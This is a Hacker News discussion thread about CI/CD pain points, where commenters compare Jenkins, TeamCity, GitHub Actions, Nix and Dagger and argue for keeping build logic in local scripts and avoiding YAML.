Already see people saying GitLab is better: yes it is, but it also sucks in different ways.
After years of dealing with this (first Jenkins, then GitLab, then GitHub), my takeaway is:
* Write as much CI logic as possible in your own code. Does not really matter what you use (shell scripts, make, just, doit, mage, whatever) as long as it is proper, maintainable code.
* Invest time that your pipelines can run locally on a developer machine as well (as much as possible at least), otherwise testing/debugging pipelines becomes a nightmare.
* Avoid YAML as much as possible, period.
* Don't bind yourself to some fancy new VC-financed thing that will solve CI once and for all but needs to get monetized eventually (see: earthly, dagger, etc.)
* Always use your own runners, on-premise if possible
hi_hi 7 days ago [-]
I came to the exact same conclusion accidentally in my first role as a Tech Lead a few years back.
It was a large enterprise CMS project. The client had previously told everyone they couldn't automate deployments due to the hosted platform security, so deployments of code and configs were all done manually by a specific support engineer following a complex multistep run sheet. That was going about as well as you'd expect.
I first solved my own headaches by creating a bunch of bash scripts to package and deploy to my local server. Then I shared that with the squads to solve their headaches. Once the bugs were ironed out, the scripts were updated to deploy from local to the dev instance. Jenkins was then brought in an quickly setup to use the same bash scripts, so now we had full CI/CD working to dev and test. Then the platform support guy got bored manually following the run sheet approach and started using our (now mature) scripts to automate deployments to stage and prod.
By the time the client found out I'd completely ignored their direction they were over the moon because we had repeatable and error free automated deployments from local all the way up to prod. I was quite proud of that piece of gorilla consulting :-)
badloginagain 7 days ago [-]
I hate the fact that CI peaked with Jenkins. I hate Jenkins, I hate Groovy, but for every company I've worked for there's been a 6-year-uptime Jenkins instance casually holding up the entire company.
There's probably a lesson in there.
mike_hearn 7 days ago [-]
It peaked with Jenkins? I'm curious which CI platforms you've used.
I swear by TeamCity. It doesn't seem to have any of these problems other people are facing with GitHub Actions. You can configure it with a GUI, or in XML, or using a type safe Kotlin DSL. These all actually interact so you can 'patch' a config via the GUI even if the system is configured via code, and TeamCity knows how to store config in a git repository and make commits when changes are made, which is great for quick things where it's not worth looking up the DSL docs or for experimentation.
The UI is clean and intuitive. It has all the features you'd need. It scales. It isn't riddled with insecure patterns like GH Actions is.
DanielHB 7 days ago [-]
I think people just hate CI set up by other people. I used TeamCity in a job a few years back and I absolutely hated it, however I imagine a lot of my hatred was the way it was set up.
CI is just the thing no one wants to deal with, yet everyone wants to just work. And like any code or process, you need engineering to make it good. And like any project, you can't just blame bad tools for crappy results.
orthoxerox 6 days ago [-]
I think people just hate enterprise CI/CD. Setting up a pipeline for your own project isn't this hard and provides immediate value. But then you start getting additional requirements like "no touching your CI/CD code", "no using plugins except A, B or C" and "deployment must be integrated with Rally/Microfocus/another corporate change management system". Suddenly your pipelines become weird and brittle and feel like busywork.
mike_hearn 7 days ago [-]
It seems to inspire strong feelings. I set it up at a previous company and at some point after I left they replaced it with Jenkins. However, nobody could explain to me why or what problems they thought they were solving. The feedback was the sort of thing you're saying now: a dislike that can't be articulated.
Whereas, I could articulate why I didn't like Jenkins just fine :)
bluGill 7 days ago [-]
I would feel that way but I've had the misfortune to work with a wide open ci system where any developer could make thanges and one guy did. The locked down system prevents me form some changes I want but in return my builds don't suddenly start failing because some ci option was turned on for everyone.
HeavyStorm 7 days ago [-]
I totally prefer to have the ci break from time to time and be able to fix it than having the risk of it being broken and having no way of fixing it
bluGill 7 days ago [-]
The people who admin our CI system do a good job so it doesn't break, (well it does all the time, but onnetwork type errors not configuration - that is IT's fault not their fault.)
The thing I want to change are things that I do in the build system so that it is checked in and previous versions when we need to build them (we are embedded where field failure is expensive so there are typically branches for the current release, next release, and head). This also means anything that can fail on CI can fail on my local system (unless it depends on something like the number of cores on the machine running the build).
While the details can be slightly different, how we have CI is how it should be. most developers should have better things to do than worry about how to configure CI.
DanielHB 6 days ago [-]
In our CI we do a lot of clever stuff like posting comments to github PRs, sending messages on slack, etc. Even though those are useful things it makes the CI a bit harder to make changes to and test. Making it do more things also makes it a bit of a blackbox.
__float 7 days ago [-]
TeamCity's "config as code" feels a bit like an afterthought to me. (It's very Windows-style, where PowerShell got bolted on, and you're still fighting a bit of an upstream current getting clickops users out of old habits. I've also only experienced it at .NET-stack jobs, though, so I might be a bit biased :-)
(I don't recall _loving_ it, though I don't have as many bad memories of it as I do for VSTS/TFS, GitLab, GH Actions, Jenkins Groovyfiles, ...)
eXpl0it3r 6 days ago [-]
The quotes around "config as code" are necessary unfortunately, because TeamCity only allows minimal config changes. The UI will always show the configuration from the main branch and if you remove or add steps it might not work.
We needed two more or less completely different configurations for old a new versions of the same software (think hotfix for past releases), but TeamCity can't handle this scenario at all. So now we have duplicated the configuration and some hacky version checks that cancel incompatible builds.
Maybe their new Pipeline stuff fixes some of these short comings.
dmuso 7 days ago [-]
Try doing a clean git clone in TeamCity. Nope, not even with the plugins that claim “clean clone” capability. You should be confident that CI can build/run/test an app with a clean starting point. If the CI forces a cached state on an agent that you can’t clear… TeamCity just does it wrong.
mike_hearn 6 days ago [-]
You just check the "delete files in checkout directory" box in the run screen. Are you thinking of something different? I've never had trouble doing a clean clone.
dmuso 6 days ago [-]
It’s been a while since I used it but I do remember that it doesn’t do a clean checkout and you can’t force it to. It leaves artifacts on the agent that can interfere with subsequent builds. I assume they do it for speed but it can affect reliability of builds
mike_hearn 6 days ago [-]
I don't know when you used it, but I've used it for years and it's always had that feature in every version I've used.
GabrielTFS 6 days ago [-]
git clean refuses to work ?
ForTheKidz 6 days ago [-]
> You can configure it with a GUI, or in XML, or using a type safe Kotlin DSL.
This is making me realize I want a CI with as few features as possible. If I'm going to spend months of my life debugging this thing I want as few corners to check as I can manage.
mike_hearn 6 days ago [-]
I've never had to spend time debugging TeamCity setups. It's very transparent and easy to understand (to me, at least).
I tend to stick with the GUI because if you're doing JVM style work the complexity and tasks is all in the build you can run locally, the CI system is more about task scheduling so it's not that hard to configure. But being able to migrate from GUI to code when the setup becomes complex enough to justify it is a very nice thing.
finnthehuman 7 days ago [-]
Jenkins is cron with bells and whistles. The result is a pile of plugins to capture all the dimensions of complexity you are likely to otherwise bury in the shell script but want them easier to point and click at. I'll hate on jenkins with the rest of them, but entropy is gonna grow and Jenkins isn't gonna say "no, you can't do that here". I deal with multiple tools where if tried to make fun about how low the jenkins plugin install starts are, you'd know exactly where I work. Once I've calmed down from working on CI I can appreciate Jenkins' attempts to manage all of it.
Any CI product play has to differentiate in a way that makes you dependent on them. Sure it can be superficially nicer when staying inside the guard rails, but in the age of docker why has the number of ways I configure running boring shell scripts gone UP? Because they need me unable to use a lunch break to say "fuck you I don't need the integrations you reserve exclusively for your CI" and port all the jobs back to cron.
And that's why jenkins is king.
marcosdumay 6 days ago [-]
And the lesson is that you want a simple UI to launch shell scripts, maybe with complex triggers but probably not.
If you make anything more than that, your CI will fail. And you can do that with Jenkins, so the people that did it saw it work. (But Jenkins can do so much more, what is the entire reason so many people have nightmares just by hearing that name.)
skor 7 days ago [-]
well, I got tired of Groovy and found out that using Jenkins with plain bash under source control is just right for us. Runs everywhere, very fast to test/develop and its all easy to change and improve.
We build Docker images mostly so ymmv.
I have a "port to github actions" ticket in the backlog but I think we're not going to go down that road now.
__float 7 days ago [-]
Yeah, I've come back around to this: you do not want "end users" writing Groovy, because the tooling around it is horrible.
You'll have to explain the weird CPS transformations, you'll probably end up reading the Jenkins plugins' code, and there's nothing fun down this path.
k4rli 7 days ago [-]
It's feature complete. Anything more will just be bloat, probably 25% of it could be reduced at least.
rrr_oh_man 7 days ago [-]
> gorilla consulting
Probably 'guerilla', but I like your version more.
hi_hi 7 days ago [-]
Haha, I'm gonna admit it, all these years and I thought gorilla/guerilla was one of those American/British spelling things, like cheque/check or gaol/jail. Boy do I feel stupid.
lenova 7 days ago [-]
Ahaha, I love the honesty here. I think we should adopt gorilla consulting into mainstream nonetheless.
Aeolun 6 days ago [-]
I feel like gorilla consulting is one of those things that’s often deliberately misspelled? For no other reason than that it’s funny.
maest 7 days ago [-]
..."gaol"?
QuercusMax 7 days ago [-]
It's the British spelling of "jail", as in "John Bunyan, a prominent Puritan preacher and author, spent 12 years in Bedford Gaol from 1660 to 1672." Pronounced jail, I believe.
sd9 6 days ago [-]
It’s the Gaelic spelling of “jail”. It hasn’t been used in mainstream British English since the 60s, outside of specific place names. Everyone in England says “jail” or “prison” today. It might be a bit different in Ireland.
williamdclt 6 days ago [-]
Interesting! I assumed it was one of these loaned-but-misspelled words from French (geôle, pronounced johl with a soft j). I wonder if there’s a common etymology between the French and Gaelic
squiggleblaz 6 days ago [-]
I think the PP was mistaken when they attributed it to Gaelic. It does indeed come from an antecedent of geôle; probably the spelling comes from the Norman form whereas the pronunciation comes from more widespread French forms. In any case, it isn't a case of "loaned-but-misspelled"; English got most of these words from times before French had standard spellings or - as in this case - pronunciations. And once they became part of English, they were subject to the future developments of English as English words, no longer French. It's like saying "geôle" is just misspelt Latin "caveola".
DonHopkins 7 days ago [-]
That's when the devs all wear gorilla suits in Zoo meetings.
Wikipedia: Gorilla Suit: National Gorilla Suit Day:
Nix is awesome for this -- write your entire series of CI tools in she'll or Python and run them locally in the exact same environment as they will run in CI. Add SOPS to bring secrets along for the ride.
jimbokun 6 days ago [-]
Would Nix work well with GitHub Actions? Or is it more of a replacement? How do you automate running tests and deploying to dev on every push, for example?
lewo 6 days ago [-]
> Would Nix work well with GitHub Actions?
You can use Nix with GitHub actions since there is a Nix GitHub action: https://github.com/marketplace/actions/install-nix. Every time the action is triggered, Nix rebuilds everything, but thanks to its caching (need to be configured), it only rebuilds targets that has changed.
> How do you automate running tests and deploying to dev on every push
Note there are also several Nix CI that can do a better job than a raw GitHub actions, because they are designed for Nix (Hydra, Garnix, Hercules, ...).
noplacelikehome 6 days ago [-]
One neat Nix feature is development shells, which let you define isolated shell environments that can be activated by invoking `nix develop` (or via direnv upon entering a directory):
Since I'm doing this within a Nix flake all of the dependencies for this environment are recorded in a lock file. Provided my clone of the repo is up to date I should have the same versions.
SOLAR_FIELDS 5 days ago [-]
You can combine this with direnv and auto-activate the nix environment when you `cd` into directories as well. We do this, and just activate the shell in ci environments with a cache. Works great.
turboponyy 6 days ago [-]
Yes. GitHub actions can be just a thin wrapper to call any Nix commands that you can run locally.
> How do you automate running tests
You just build the Nix derivation that runs your tests, e.g. `nix build #tests` or `nix flake check` in your workflow file.
> deploying to dev on every push
You can set up a Nix `devShell` as a staging area for any operations you'd need to perform for a deployment. You can use the same devShell both locally and in CI. You'd have to inject any required secrets into the Action environment in your repository settings, still. It doesn't matter what your staging environment is comprised of, Nix can handle it.
mikepurvis 7 days ago [-]
Strongly isolated systems like Nix and Bazel are amazing for giving no-fuss local reproducibility.
Every CI "platform" is trying to seduce you into breaking things out into steps so that you can see their little visualizations of what's running in parallel or write special logic in groovy or JS to talk to an API and generate notifications or badges or whatever on the build page. All of that is cute, but it's ultimately the tail wagging the dog— the underlying build tool should be what is managing and ordering the build, not the GUI.
What I'd really like for next gen CI is a system that can get deep hooks into local-first tools. Don't make me define a bunch of "steps" for you to run, instead talk to my build tool and just display for me what the build tool is doing. Show me the order of things it built, show me the individual logs of everything it did.
Same thing with test runners. How are we still stuck in a world where the test runner has its own totally opaque parallelism regime and our only insight is whatever it chooses to dump into XML at the end, which will be probably be nothing if the test executable crashes? Why can't the test runner tell the CI system what all the processes are that it forked off and where each one's respective log file and exit status is expected to be?
steeleduncan 7 days ago [-]
> Write as much CI logic as possible in your own code
Nix really helps with this. Its not just that you do everything via a single script invocation, local or ci, you do it in an identical environment, local or ci. You are not trying to debug the difference between Ubuntu as setup in GHA or Arch as it is on your laptop.
Setting up a nix build cache also means that any artefact built by your CI is instantly available locally which can speed up some workflows a lot.
mikepurvis 7 days ago [-]
Absolutely. Being able to have a single `nix build` line that gets all the way from source to your final asset (iso, ova, container image, whatever) with everything being aggressively cached all the way along is a game changer. I think it's worth the activation energy for a lot more organizations than realize it.
fiddlerwoaroof 7 days ago [-]
Imo, the “activation energy” is a lot lower than it appears too. The determinate systems nix installer solves a lot of the local development issues and it’s fairly easy, as a first pass, to write a simple derivation that just copies your current build process and uses nix for dependencies.
jimbokun 6 days ago [-]
Sounds like a business that surfaces the power of Nix with a gentle learning curve as a simpler, cleaner CI tool could have some success. Every time I see Nix come up, it’s described as very powerful but difficult to learn to use.
shykes 7 days ago [-]
Dagger.io does this out of the box:
- Everything sandboxed in containers (works the same locally and in CI)
- Integrate your build tools by executing them in containers
- Send traces, metrics and logs for everything at full resolution, in the OTEL format. Visualize in our proprietary web UI, or in your favorite observability tool
nand_gate 7 days ago [-]
It's doa, Sol.
shykes 7 days ago [-]
Since you're using my first name in a weird and creepy way, I'll assume you're a hater. It's been so long since I've had one! Are you reactivating from the Docker days, or are you the first of a new cohort? That would be an exciting development, since getting haters is a leading sign of runaway success.
nand_gate 13 hours ago [-]
Not a hater - nobody will contest that Docker was a huge success, congrats... I just don't think Dagger has legs tbh.
nand_gate 7 days ago [-]
Why would you need extra visualisation anyway, tooling like Nix is already what you see is what you get!
jkarni 7 days ago [-]
It’s still helpful to eg fold different phases in Nix, and different derivation output.
I work on garnix.io, which is exactly a Nix-based CI alternative for GitHub, and we had to build a lot of these small things to make the experience better.
squiggleblaz 6 days ago [-]
Basically an online version of nix-output-monitor. Might be half an idea. But it doesn't get you 100%: you get CI, but not CD.
mikepurvis 6 days ago [-]
Delivery meaning the deployment part? I think by necessity that does differ a bit from happens locally just because suddenly there's auth, inventory, maybe a staging target, whatever.
All of that is a lot more than what a local dev would want, deploying to their own private test instance, probably with a bunch of API keys that are read-only or able to write only to other areas meant for validation.
specialist 7 days ago [-]
We used to just tail the build script's output.
Maybe add some semi-structured log/trace statements for the CI to scrap.
No hooks necessary.
mikepurvis 7 days ago [-]
That works so long as the build script is just doing a linear series of things. But if it's anything remotely modern then a bunch of stuff is going on in parallel, and if all the output is being funneled to a single log, you can end up with a fair bit of wind-down spew you have to scroll through to find the real/initial failure.
How much better would it be if the CI web client could just say, here's everything the build tool built, with their individual logs, and here's a direct link to the one that failed, which canceled everything else?
teeray 7 days ago [-]
> What I'd really like for next gen CI is a system that can get deep hooks into local-first tools.
But how do you get that sweet, sweet vendor-lock that way? /s
doix 7 days ago [-]
I came from the semiconductor industry, where everything was locally hosted Jenkins + bash scripts. The Jenkins job would just launch the bash script that was stored in perforce(vcs), so all you had to do to run things locally was run the same bash script.
When I joined my first web SaaS startup I had a bit of a culture shock. Everything was running on 3rd party services with their own proprietary config/language/etc. The base knowledge of POSIX/Linux/whatever was almost completely useless.
I'm kinda used to it now, but I'm not convinced it's any better. There are so many layers of abstraction now that I'm not sure anybody truly understands it all.
Xcelerate 7 days ago [-]
Haha, I had the same experience going from scientific work in grad school to big tech. The phrase “a solution in search of a problem” comes to mind. The additional complexity does create new problems however, which is fine for devops, because now we have a recursive system of ensuring job security.
It blows my mind what is involved in creating a simple web app nowadays compared to when I was a kid in the mid-2000s. Do kids even do that nowadays? I’m not sure I’d even want to get started with all the complexity involved.
DrFalkyn 6 days ago [-]
Creating a simple web app isn’t that hard.
If you want to use a framework The React tutorials from Traversy media are pretty good. You can even do cross platform into mobile app with frameworks like React Native or Flutter if you want iOS/Android native apps.
Vite has been a godsend for React/Vue. It’s no longer the circus it was in the mid 2010s. Google’s monopoly has made things easier for web devs. No more babel or polyfill or createReactApp.
People do still avoid frameworks and use raw HTML/CSS/Javascript. HTMX has made sever fetches a lot easier.
You probably want a decent CSS framework for reponsive design. Everyone used to use minimalist ones like Tailwimd have become more popular.
If you need a backend and want to do something simple you can use BaaS (Backend as a service) platforms like Firebase. Otherwise setting up a NodeJS server with some SQL or KV store like SQLLite or MongoDB isn’t too difficult
CI/CD systems exist to streamline testing and deployment for large complex apps. But for individual hobbyist projects it’s not worth it.
7 days ago [-]
sgarland 7 days ago [-]
> I'm kinda used to it now, but I'm not convinced it's any better.
It’s demonstrably worse.
> The base knowledge of POSIX/Linux/whatever was almost completely useless.
Guarantee you, 99% of the engineering team there doesn’t have that base knowledge to start with, because of:
> There are so many layers of abstraction now that I'm not sure anybody truly understands it all.
Everything is constantly on fire, because everything is a house of cards made up of a collection of XaaS, all of which are themselves houses of cards written by people similarly clueless about how computers actually operate.
I hate all of it.
zamalek 7 days ago [-]
> I'm not convinced it's any better.
Your Jenkins experience is more valuable and worth replicating when you get the opportunity.
verdverm 7 days ago [-]
We're doing the same, but replacing the bash script with Dagger.
Once you get on Dagger, you can turn your CI into minimal Dagger invocations and write the logic in the language of your choice. Runs the same locally and in automation
pdimitar 7 days ago [-]
Would love to see a more detailed write-up on this way of using Dagger.
verdverm 7 days ago [-]
The idea is a common pattern among Dagger users, but you can do the same with bash scripts, python, or any entrypoint. It's more of a CI ethos, and for me Dagger is an implementation detail.
I personally hold Dagger a bit different from most, by writing a custom CLI and using the Dagger Go SDK directly. This allows you to do more host level commands, as everything in a Dagger session runs in a container (builds and arbitrary commands).
I've adopted the mono/megarepo organization and have a pattern that also includes CUE in the solution. Starting to write that up here: https://verdverm.com/topics/dev/dx
nsonha 7 days ago [-]
it's just common sense, which is unfortunately lost with sloppy devs. People go straight from junior dev to SRE without learning engineering principles through building products first.
jimbokun 6 days ago [-]
I feel like more time is spent getting CI working these days than on the actual applications.
Between that and upgrading for security patches. Developing user impacting code is becoming a smaller and smaller part of software development.
cookiengineer 7 days ago [-]
This.
I heavily invested in a local runner based CI/CD workflow. First I was using gogs and drone, now the forgejo and woodpecker CI forks.
It runs with multiple redundancies because it's a pretty easy setup to replicate on decentralized hardware. The only thing that's a little painful is authentication and cross-system pull requests, so we still need our single point of failure to merge feature branches and do code reviews.
Due to us building everything in go, we also decided to have always a /toolchain/build.go so that we have everything in a single language, and don't need even bash in our CI/CD podman/docker images. We just use FROM scratch, with go, and that's it. The only exception being when we need to compile/rebuild our ebpf kernel modules.
To me, personally, the Github Actions CVE from August 2024 was the final nail in the coffin. I blogged about it in more technical detail [1] and guess what was the reason that the TJ actions have been compromised last week? Yep, you guessed right, the same attack surface that Github refuses to fix, a year later.
The only tool, as far as I know, that somehow validates against these kind of vulnerabilities, is zizmor [2]. All other tools validate schemas, not vulnerabilities and weaknesses.
My years using Concourse were a dream compared to the CI/CD pains of trying to make github actions work (which I fortunately didn't have to do a lot of). Add that to the list of options for people who want open source and their own runners
regularfry 6 days ago [-]
One of the very few CI platforms that I've heard spoken well of was a big shared Concourse instance where the entire pipeline was predefined. You added some scripts named by convention to your project to do the right thing at each step, and it all just worked for you. Keeping it running was the job of a specific team.
sleepybrett 7 days ago [-]
Did they finally actually say how the tj actions repo got compromised. When I was fixing that shit on saturday it was still 'we don't know how they got access!?!?'
cookiengineer 6 days ago [-]
(I'm assuming you read my technical article about the problem)
If you take a look at the pull requests in e.g. the changed-files repo, it's pretty obvious what happened. You can still see some of the malformed git branch names and other things that the bots tried out. There were lots of "fixes" that just changed environment variable names from PAT_TOKEN to GITHUB_TOKEN and similar things afterwards, which kind of just delays the problem until malware is executed with a different code again.
As a snarky sidenote: The Wiz article about it is pretty useless as a forensics report, I expected much more from them. [1]
The conceptual issue is that this is not fixable unless github decides to rewrite their whole CI/CD pipeline, because of the arbitrary data sources that are exposed as variables in the yaml files.
The proper way to fix this (as Github) would be to implement a mandatory linter step or similar, and let a tool like zizmor check the file for the workflow. If it fails, refuse to do the workflow run.
Whenever possible I now just use GitHub actions as a thin wrapper around a Makefile and this has improved my experience with it a lot. The Makefile takes care of installing all necessary dependencies and runs the relevant build/Test commands. This also enables me to test that stuff locally again without the long feedback loop mentioned in other comments in this thread.
In addition to the other comments suggesting dagger is not the saviour due to being VC-funded, it seems like they have decided there's no money in CI, but AI... yes there's money there! And "something something agents".
From dagger.io...
"The open platform for agentic software.
Build powerful, controllable agents on an open ecosystem. Deploy agentic applications with complete visibility and cross-language capabilities in a modular, extensible platform.
Use Dagger to modernize your CI, customize AI workflows, build MCP servers, or create incredible agents."
shykes 7 days ago [-]
Hello! Dagger CEO here. Yes, we discovered that, in addition to running CI pipelines, Dagger can run AI agents. We learned this because our own users have told us.
So now we are trying to capitalize on it, hence the ongoing changes to our website. We are trying to avoid the "something something agents" effect, but clearly, we still have work to do there :) It's hard to explain in marketing terms why a ephemeral execution engine, cross-language component system, deep observability and interactive CLI can be great at running both types of workloads... But we're going to keep trying!
Internally we never thought of ourselves as a CI company, but as an operating system company operating in the CI market. Now we are expanding opportunistically to a new market: AI agents. We will continue to support both, because our platform can run both.
Please be careful. I'd love to adopt Dagger, but the UI in comparison to GHA, is just not a value add. I'd hate for y'all to go the AI route that Arc did... and lose all your users. There is A LOT to CICD, which can be profitable. I think there's still a lot more features needed before it's compelling and I would worry Agentic AI will lead you to a hyper-configurable, muddled message.
shykes 7 days ago [-]
Thank you. Yes, I worry about muddling the message. We are looking for a way to communicate more clearly on the fundamentals, then layer use cases on top. It is the curse of all general-purpose platforms (we had the same problem with Docker).
The risk of muddling is limited to the marketing, though. It's the exact same product powering both use cases. We would not even consider this expansion if it wasn't the case.
For example, Dagger Cloud implements a complete tracing suite (based on OTEL). Customers use it for observability of their builds and tests. Well it turns out, you can use the exact same tracing product for observability of AI agents too. And it turns out that observability is huge unresolved problem of AI agents! The reason is because, fundamentally, AI agents work exactly like complicated builds: the LLM is building its state, one transformation at a time, and sometimes it has side effects along the way via tool calling. That is exactly what Dagger was built for.
So, although we are still struggling to explain this reality to the market: it is actually true that the Dagger platform can run both CI and AI workflows, because they are built on the same fundamentals.
oulipo 6 days ago [-]
On another note, I'd love if you open-sourced your timeline / log UI component :) it's quite pretty, and could be useful in many contexts haha
Or I'll ask v0.dev to reimplement it, but I think it'd be more complete if you did it
oulipo 6 days ago [-]
Hmmmm... so I think the crux of the matter is here: that you clearly articulate why your platform (for both containers and agents) is really helpful to handle cases where there are both states and side-effects
I can understand what you're trying to say, but because I don't have clear "examples" at hand which show me why in practice handling such cases are problematic and why your platform makes that smooth, I don't "immediately" see the value-added
For me right now, the biggest "value-added" that I perceive from your platform is just the "CI/CD as code", a bit the same as say Pulumi vs Terraform
But I don't see clearly the other differences that you mention (eg observability is nice, but it's more "sugar" on top, not a big thing)
I have the feeling that indeed the clean handling of "state" vs "side-effects" (and what it implies for caching / retries / etc) is probably the real value here, but I fail to perceive it clearly (mostly because I probably don't (or not yet) have those issues in my build pipelines)
If you were to give a few examples / ELI5 of this, it would probably help convert more people (eg: I would definitely adopt a "clean by default" way of doing things if I knew it would help me down the road when some new complex-to-handle use-cases will inevitably pop up)
oulipo 6 days ago [-]
I did ask you on your Discord, but perhaps you could summarize here / ELI5 why Dagger would be a great fit for a kind of "MCP-like" operating system?
__float 7 days ago [-]
I can't really fault them too much for hopping on the latest bandwagon, if their software is general enough at running workflows for it to fit.
(As much as I personally like working with CI and build systems, it's true there's not a ton of money in it!)
jimbokun 6 days ago [-]
Take out each reference to AI and the meaning doesn’t change in the slightest.
lou1306 7 days ago [-]
> * Don't bind yourself to some fancy new VC-financed thing that will solve CI once and for all but needs to get monetized eventually (see: earthly, dagger, etc.)
Literally from comment at the root of this thread.
verdverm 7 days ago [-]
Docker has raised money, we all use it. Dagger is by the originators of Docker, I personally feel comfortable relying on them, they are making revenues too.
triyambakam 7 days ago [-]
But are mise and dagger VC funded? I don't see any pricing pages there.
Mise indeed isn't, but its scope is quite a bit smaller than Dagger.
internetter 7 days ago [-]
> Mise indeed isn't, but its scope is quite a bit smaller than Dagger.
A lot of us could learn... do one thing and do it well
arcanemachiner 7 days ago [-]
Ironic, because mise is a glued-together combination of asdf, direnv, and Makefiles.
7 days ago [-]
fireflash38 6 days ago [-]
I implemented a thing such that the makefiles locally use the same podman/docker images as the CI/CD uses. Every command looks something like:
target:
$(DOCKER_PREFIX) build
When run in gitlab, the DOCKER_PREFIX is a no-op (it's literally empty due to the CI=true var), and the 'build' command (whatever it is) runs in the CI/CD docker image. When run locally, it effectively is a `docker run -v $(pwd):$(pwd) build`.
It's really convenient for ensuring that if it builds locally, it can build in CI/CD.
akanapuli 7 days ago [-]
I dont quite understand the benefit. How does running commands from the Makefile differ from running commands directly on the runner ? What benefit does Makefile brings here ?
ZeWaka 7 days ago [-]
You can't run GitHub actions yml workflows locally (officially, there's tools like act).
fiddlerwoaroof 7 days ago [-]
If you have your CI runner use the same commands as local dev, CI basically becomes an integration test for the dev workflow. This also solves the “broken setup instructions” problem.
mwenge 7 days ago [-]
Do you have a public example of this? I'd love to see how to do this with Github Actions.
cmsj 7 days ago [-]
I don't have a makefile example, but I do functionally the same thing with shell scripts.
I let GitHub actions do things like the initial environment configuration and the post-run formatting/annotation, but all of the actual work is done by my scripts:
After years of trial and error our team has come to the same conclusion. I know some people might consider this insanity, but we actually run all of our scripts as a separate C# CLI application (The main application is a C# web server). Effectively no bash scripts, except as the entry point here and there. The build step and passing the executable around is a small price to pay for the gain in static type checking, being able to pull in libraries as needed, and knowing that our CI is not going to down because someone made a dumb typo somewhere.
The other thing I would add is consider passing in all environment variables as args. This makes it easy to see what dependencies the script actually needs, and has the bonus of being even more portable.
baq 7 days ago [-]
> I know some people might consider this insanity
Some people here still can’t believe YAML is used for not only configuration, but complex code like optimized CI pipelines. This is insane. You’re actually introducing much needed sanity into the process by admitting that a real programming language is the tool to use here.
I can’t imagine the cognitive dissonance Lisp folks have when dealing with this madness, not being one myself.
TeMPOraL 7 days ago [-]
> I can’t imagine the cognitive dissonance Lisp folks have when dealing with this madness, not being one myself.
After a decade trying to fight it, this one Lisper here just gave up. It was the only way to stay sane.
I remain hopeful that some day, maybe within our lifetimes, the rapid inflation phase of software industry will end, and we'll have time to rethink and redo the fundamentals properly. Until then, one can at least enjoy some shiny stuff, and stay away from the bleeding edge, aka. where sewage flows out of pipe and meets the sea.
(It's gotten a little easier now, as you can have LLMs deal with YAML-programming and other modern worse-is-better "wisdom" for you.)
no_wizard 7 days ago [-]
I'm shocked there isn't a 'language for config' that hasn't become the de facto standard and its YAML all the way down seemingly. I am with you 100%.
It would really benefit from a language that intrinsically understood its being used to control a state machine. As it is, that is what nearly all folks want in practice is a way to run different things based on different states of CI.
A lisp DSL would be perfect for this. Macros would make things alot easier in many respects.
Unfortunately, there's no industry consensus and none of the big CI platforms have adopted support for anything like that, they all use variants of YAML (I always wondered who started it with YAML and why everyone copied that, if anyone knows I'd love to read about it).
Honestly, I can say the same complaints hold up against the cloud providers too. Those 'infrastructure as code' SDKs really don't lean into the 'as code' part very well
julik 6 days ago [-]
I think the issue here is mostly the background the CI setups came from. They were frequently coming from the "ops" part of the ecosystem, and some ops folks held some ideas very strongly back then (I heard this first hand):
"Application and configuration should be separate, ideally in separate repos. It is the admin's job to configure, not the developer's"
"I do not need to learn your garbage language to understand how to deploy or test your application"
"...as a matter of fact, I don't need to learn the code and flows of the application itself either - give me a binary that runs. But it should work with stale configs in my repo."
"...I know language X works for the application but we need something more ubiquitous for infra"
Then there was a crossover of three streams, as I would call it:
YAML was emerging "hard" on the shoulders of Rails
Everyone started hating on XML (and for a good reason)
Folks working on CI services (CruiseControl and other early solutions) and ops tooling (chef, ansible) saw JSON's shortcomings (now an entire ecosystem has configuration files with no capability to put in a comment)
Since everybody hated each other's languages, the lowest common denominator for "configuration code" came out to be YAML, and people begrudgingly agreed to use it
The situation then escalated severely with k8s, which adopted YAML as "the" configuration language, and a whole ecosystem of tooling sprung up on top using textual templating (!) of YAML as a layer of abstraction. For k8s having a configuration language was an acute need, because with a compiled language you need something for configuration that you don't have to compile with the same toolchain just to use - and I perfectly "get it" why they settled for YAML. I do also get why tools like Helm were built on top of YAML trickery - because, be it that Helm were written in some other language, and have its charts use that, they would alienate all the developers that either hate that language personally, or do not have it on the list of "golden permitted" at their org.
Net result is that YAML was chosen not because it is good, but because it is universally terrible in the same way for everyone, and people begrudgingly settled on it.
With CI there is an extra twist that a good CI setup functions as a DAG - some tasks can - and should - run in parallel for optimization. These tasks produce artifacts which can be cached and reused, and a well-set CI pipeline should be able to make use of that.
Consequently, I think a possible escape path - albeit an expensive one - would be for a "next gen" CI system to expose those _task primitives_ via an API that is easy to write SDKs for. Read: not a grpc API. From there, YAML could be ditched as "actual code" would manipulate the CI primitives during build.
mdaniel 7 days ago [-]
> (I always wondered who started it with YAML and why everyone copied that, if anyone knows I'd love to read about it).
I know this isn't a definite answer to your question, but it was still super interesting to me and hopefully it will inspire someone else to dig into
finding the actual answer
- I was shocked that GitHub existed in 2008 https://web.archive.org/web/20081230235955/http://github.com... with an especial nod to no longer a pain in the ass and Not only is Git the new hotness, it's a fast, efficient, distributed version control system ideal for the collaborative development of software but this was just "for funsies" link since they were very, very late to the CI/CD game
- cloud-init had yaml in 2010 https://github.com/openstack-archive/cloud-init/blob/0.7.0/d... so that's a plausible "it started here" since they were yaml declarations of steps to perform upon machine boot (and still, unquestionably, my favorite user-init thing)
> Some people here still can’t believe YAML is used for not only configuration, but complex code like optimized CI pipelines.
I've been using YAML for ages and I never had any issue with it. What do you think is wrong with YAML?
mst 7 days ago [-]
Turing complete YAML ends up being an app specific terrible programming language.
Many of us would rather use a less terrible programming language instead.
hadlock 7 days ago [-]
Something went horribly wrong if your coworkers are putting switching logic inside your config
motorest 7 days ago [-]
[flagged]
hadlock 7 days ago [-]
I've been using YAML professionally for a decade and other than forgetting to wrap some values in quotes, has been an absolute non issue.
Some people talk about YAML being a turing complete language, if people try to do that in your CI/CD system just fire them
I'll allow helm style templating but that's about it.
mschuster91 7 days ago [-]
> Some people here still can’t believe YAML is used for not only configuration, but complex code like optimized CI pipelines. This is insane.
